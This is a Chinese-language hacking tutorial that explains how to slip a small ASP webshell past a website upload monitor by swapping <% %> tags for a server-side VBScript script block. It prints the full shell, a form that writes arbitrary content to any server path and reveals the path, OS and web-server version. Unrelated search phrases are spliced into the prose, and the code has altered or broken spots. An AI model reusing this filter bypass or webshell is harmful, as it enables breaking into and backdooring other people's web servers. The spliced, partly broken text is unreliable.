当菜鸟黑客上传小马遇到一流监控，结果就悲剧了，不管怎么传，都是显示空白。 这是怎么回事呢？当你上传小马时，监控会判断文件里是不是存在非法字符。 非法字符也就是它自身设置好的关键词。 一般都是 web 大马等上面的关键词。qq聊天记录在哪个文件夹只要存在。 直接把整个文件过滤成空白。
上传测试一下，你会发现。他不仅仅过滤一般的大马关键词、一句话的关键 函数。 = =|||竟然直接判断是否存在 <%%> 这是所有asp都存在的!! 需要传能解析的 asp.怎么能少了 <%%>呢?如何突破呢? 防火墙怎么关
突破一流监控上传小马方法如下：
//不需要用到<%%>
这不就是一般的script的书写方式么。
你把一个小马修改为这种方式就可以了。
就不能被过滤掉了：代码如下
<script language=VBScript runat=server>
dim da
set fso=server.*object(“scripting.filesystemobject“)
path=request(“path“)
if path<>““ then
data=request(“da“)
set da=fso.*textfile(path,true)
da.write data
if err=0 then
Response.Write “yes“
else
Response.Write “no“
end if
err.clear
end if
set da=nothing
set fos=nothing
Response.Write “<form action=‘‘ method=post>“
Response.Write “<input type=text name=path>“
Response.Write “<br>“
Response.Write “当前文件路径:“&server.mappath(request.servervariables(“script_name“))
Response.Write “<br>“
Response.Write “操作系统为:“&Request.ServerVariables(“OS“)
Response.Write “<br>“
Response.Write “WEB服务器版本为:“&Request.ServerVariables(“SERVER_SOFTWARE“)
Response.Write “<br>“
Response.Write “<textarea name=da cols=50 rows=10 width=30></textarea>“
Response.Write “<br>“
Response.Write “<input type=submit value=save>“
Response.Write “</form>“
</Script>